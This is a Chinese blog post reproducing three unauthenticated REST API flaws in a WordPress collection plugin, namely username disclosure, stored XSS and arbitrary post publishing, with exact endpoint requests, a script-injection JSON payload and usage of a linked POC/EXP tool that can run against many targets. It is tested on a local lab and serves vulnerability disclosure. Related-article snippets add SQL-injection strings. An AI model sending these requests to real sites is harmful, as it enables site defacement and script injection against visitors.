WordPress插件蜜蜂采集最新(2022-2-16)漏洞(XSS, WordPress用户名暴露,任意文章发布)复现

已于 2022-02-17 00:02:47 修改
阅读量3.5k 收藏 1
点赞数
文章标签: xss 安全 web安全 wordpress golang
于 2022-02-16 23:50:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deng_Xian_Sheng/article/details/122972777
版权

本次漏洞是WordPress的一款文章采集插件:蜜蜂采集,未对实现插件功能的相关API做鉴权;导致任何人发送的请求都会被执行。

下载漏洞复现环境:https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA 提取码: wwi7

部分POC和EXP:https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP

下载环境后解压“WordPress插件蜜蜂采集复现环境.zip”
依据README.md搭建环境,不再复述

漏洞一

WordPress用户名暴露
在该插件的采集页面如下图:
未对获取采集页面信息的API做限制,导致攻击者获得WordPress用户名等信息
在这里插入图片描述
在这里插入图片描述
我们打开检查元素并刷新页面看看POST请求
在这里插入图片描述
然后复制请求URL与请求内容到测试工具
在这里插入图片描述
在这里插入图片描述

URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}

可以看到,不需要鉴权就获得了信息
在这里插入图片描述

漏洞二

XSS攻击
在该插件的“自定义代码”添加页,同样未鉴权;可轻易查询、添加自定义代码。
在这里插入图片描述
在这里插入图片描述
我们来利用测试工具发送请求看看

#查看自定义代码
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}

获得了自定义代码的内容(因为没有添加自定义代码,所以为空)
在这里插入图片描述

#添加自定义代码
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{
    "action": "save",
    "data": [
        {
            "title": "testCode",
            "content": "<script>alert(\"我是邓文怡,我在广东深圳!\")</script>\n<h1>我是邓文怡,我在广东深圳!</h1>",
            "status": "on",
            "position": "head"
        }
    ]
}

可以看到,成功添加了自定义代码,并页面也有了反应
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注明:“我很喜欢这句话;我想把它写在文中;不要见怪;无伤大雅。”

漏洞三

任意文章发布
这个复现就要靠上文中的“部分POC和EXP”的下载链接了。
具体实现过程可以看看Golang代码,和Github仓库中的README.md

我们这里仅下载作者编译好的可执行文件;简单使用一下。
下载可执行文件:
在这里插入图片描述

创建一个文件夹,将可执行文件放进去;因为它会在执行目录产生日志
在这里插入图片描述
-h查看使用方式
在这里插入图片描述
这里我简单说明一下:

--IP 你Kali的IP
--Port 你Kali的端口,任意;只要不被占用即可
--Type 值为'POC'或者'EXP',默认POC

--PayloadForTitle与--PayloadForMain 
二者填一个就行,都填也可;这是--Type为EXP情况下需填的Payload。PayloadForTitle为发布文章的标题;PayloadForMain为发布文章的内容。--Type为POC的情况下可不填此项。Payload支持文件路径。

--PageType 文章发布类型,是WordPress的文章还是页面;默认'Article'文章;也可填页面'Page'。

--ET 渗透目标,如果不填,则为交互模式;填则为自动化模式;仅支持文件路径。文件内目标以','分隔;如:
192.168.0.1,192.168.0.2,192.168.0.3

我们使用交互模式测试一下漏洞是否存在:

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080

在这里插入图片描述
进入交互模式,根据提示输入-h帮助
这里我再简单说明一下:

 --ET 渗透目标,目标以','分隔;如:
192.168.0.1,192.168.0.2,192.168.0.3

Close 退出交互模式

发现漏洞存在,如下图:

-ET 192.168.8.6:8080

在这里插入图片描述
我们结束POC,添加EXP参数进入EXP测试一下:

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle 我是邓文怡,我在广东深圳 --PayloadForMain 我是邓文怡,我在广东深圳

在这里插入图片描述
发现渗透已经成功:
在这里插入图片描述
查看WordPress也确实添加了一篇文章:
在这里插入图片描述
在这里插入图片描述
退出EXP,我们看到当前目录产生了很多日志文件,里面记录了渗透情况:
在这里插入图片描述

漏洞修复建议

暂时禁用该插件,可避免被此漏洞影响。
在这里插入图片描述

注意⚠️,本次测试在安全环境下进行;所有代码仅限在复现环境中运行,请勿恶意篡改代码将代码运行在测试环境以外的地方;否则后果自负!

Deng_Xian_Shemg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
fastjson反序列化漏洞
谢公子的博客
12-27 2404
Fastjson Fastjson是一个阿里巴巴开源的一款使用Java语言编写的高性能功能完善的JSON库,通常被用于将Java Bean和JSON 字符串之间进行转换。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。但是,从诞生之初,fastjson就多次被爆出存在反序列化漏洞。并且,每次都和autoType有关!那么,什
蜜蜂Moji「Bee Moji」-crx插件
03-12
用Emojis表达更多 BeeMoji是第一个Chrome扩展程序,可在您键入时提示表情符号。 您可以从建议中选择一种表情符号,也可以全部粘贴。 用表情符号表达更多信息! 支持语言:English
漏洞分析】WordPress REST API 内容注入漏洞分析
Anprou的博客
02-08 4006
WordPress更新到最新版本。
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
web漏洞(CSRF-SSRF-文件包含-文件解释-文件下载-目录遍历-sql注入-文件上传-反序列化-XSS-XXE-RCE-逻辑越权)
weixin_46626737的博客
03-13 776
爆出列名:id=1+and+1=2+union+select+1,null,oid,null,4+from+pg_class+where+relname='表名'+limit+1+offset+0--爆出字段id=1+and+1=2+union+select+1,null,column_name,null,4+from+information_schema.columns+where+table_name='表名'+limit+1+offset+0--例如:filename='1.jpg';
wp linux 权限,WordPress又曝漏洞:REST API由于权限控制失效致内容注入
weixin_33458486的博客
04-30 284
WordPress最近曝出内容注入漏洞,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON...
WordPress的管理员用户名是如何泄露的
fmz2222的博客
06-04 1449
WordPress 的管理员账户很容易就能获取,虽然说拿到了管理员账号,用处不是很大,但是不排除有些小白的密码是简单的数字密码。被攻击者爆破或者撞库成功,从而获得后台的管理员账户。那么。攻击者是怎样拿到你的Wordpress 【管理员用户名】的,以及如何保护自己的管理员账户不被获取,这篇文章就来谈谈!!!正在上传…重新上传取消1、先说说管理员账户如何泄露攻击者或者攻击程序构造了: 的URL进行GET,这样99%会返回一串信息,里面包含了你的管理员账户。如下: [{"id":1,"name":"d
蜜蜂采集器 怎么用
xiaome4242的专栏
08-08 1502
Welcome to my blog!小蜜蜂采集器 软件大小:941 KB软件语言:简体中文软件类别:国产软件 / 免费版 / 搜索引擎应用平台:Win9x/NT/2000/XP/2003界面预览:无插件情况: 投诉更新时间:2006-09-29 10:00:19下载次数:6719推荐等级:联 系 人:bcdownreg.com开 发 商:小蜜蜂采集
极致cms限制某会员发布文章(防止被人恶意发布信息)
qq_34543460的博客
01-07 211
2、打开app\home\c\UserController.php,文件,也可以将UserController.php复制一份到app\home\plugins下面,防止更新呗覆盖。JsonReturn(['code'=>2,'msg'=>JZLANG('您的账号没有发布文章的权限,不能发布帖子!您的账号没有发布文章的权限,不能发布帖子!Error(JZLANG('您的账号没有发布文章的权限,不能发布帖子!选择单项选择,输入“允许发布文章=1,禁止发布文章=2”
我宣布,这是我2022年吃的最有意思的瓜!
芋艿V
06-12 654
点击上方“芋道源码”,选择“设为星标”管她前浪,还是后浪?能浪的浪,才是好浪!每天 10:33更新文章,每天掉亿点点头发...源码精品专栏原创 | Java 2021超神之路,很肝~中文详细注释的开源项目RPC 框架 Dubbo 源码解析网络应用框架 Netty 源码解析消息中间件 RocketMQ 源码解析数据库中间件 Sharding-JDBC 和 MyCAT ...
discuz发布接口-discuz自动采集发布接口
qq787143156的博客
06-03 347
discuz发布接口,什么是discuz发布接口。可以实现批量discuz不同用户发布帖子吗?今天给大家分享一款免费的discuz采集伪原创发布工具。支持不同用户发布的帖子。同时也支持自动发布文章。详细参考图片教程网站优化又叫做搜索引擎优化,英文称之为SEO,全写是searchengineoptimization,网站优化是网络营销的一个十分重要的渠道,相对网络营销的其他渠道如竞价,CPS,微博,微信渠道费用和效果价值会更大化。因而很多公司站长都注重SEO,那么网站优化怎样做呢,百度通知你把握好三个方向。第
蜜蜂「BEES」-crx插件
03-12
表达你对蜜蜂的爱是他们应得的唯一方式 您是否曾经被蜜蜂深深地迷住过,以至于您最大的世俗愿望是被一团美丽的蜜蜂包围着,所有的蜜蜂都嗡嗡作响在美丽的乐团里嗡嗡作响? 此扩展旨在通过授予用户按一下按钮表达对蜜蜂种类的迷恋的能力来体现这种感觉。 激活后,扩展程序打开一个窗口,该窗口开始播放蜜蜂爱好者的适当国歌,并显示无限循环的蜜蜂幻灯片。 欢迎添加有关蜜蜂图像的建议。 支持语言:English
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
XSSPosed-releases:XSSPosed-releases是提取最新发布XSS漏洞的工具
05-13
XSSPosed版本XSSPosed-releases是一种工具,该工具提取通过XSSPosed.org发布最新XSS漏洞,这些漏洞在受感染的网站上显示有关恶意负载的完整披露。
fastjson java 字段排序_fastjson漏洞总结
weixin_32639437的博客
01-07 445
fastjson 简介什么是 fastjsonfastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson 的使用序列化String jsonString = JSON.toJSONString(Object);反序列化Object obj = ...
读取本地josn文件_攻击者是如何利用SSRF漏洞读取本地文件并滥用AWS元数据的
weixin_36322454的博客
01-13 227
漏洞简介首先,我抓取并手动执行了该应用程序上的所有用户操作。之后,我通过burp检查了http历史记录中的所有的请求,坦率的说我当时想要挖掘url重定向漏洞。所以,我通过Burp搜索了url=所有可能的参数,并最终发现了一个如下所示的网址:https://example.com/viewimage/?url=AWS图像位置(该图像存储在AWS,所以需要从这里加载)实际上,这个端点就是用...
PS网页设计教程XXX——在PS中创建一个漫画书主题网页布局
weixin_34133829的博客
11-03 196
作为编码者,美工基础是偏弱的。我们可以参考一些成熟的网页PS教程,提高自身的设计能力。套用一句话,“熟读唐诗三百首,不会作诗也会吟”。 本系列的教程来源于网上的PS教程,都是国外的,全英文的。本人尝试翻译这些优秀的教程。因为翻译能力有限,翻译的细节上还有待推敲,希望广大网友不吝赐教。 约定: 1、本文的软件是Photoshop CS5版本 2、原教程的截图是英文的,本人在重新制作的基础上,...
tomcat8怎么解决X-XSS-Protection,X-Content-Type-Options漏洞
最新发布
12-07
根据提供的引用内容,X-XSS-Protection和X-Content-Type-Options都是用来防范XSS攻击的响应头。其中,X-XSS-Protection可以关闭或启用XSS保护,而X-Content-Type-Options可以防止浏览器将响应内容解释为MIME类型不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deng_Xian_Shemg

捐助1元钱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值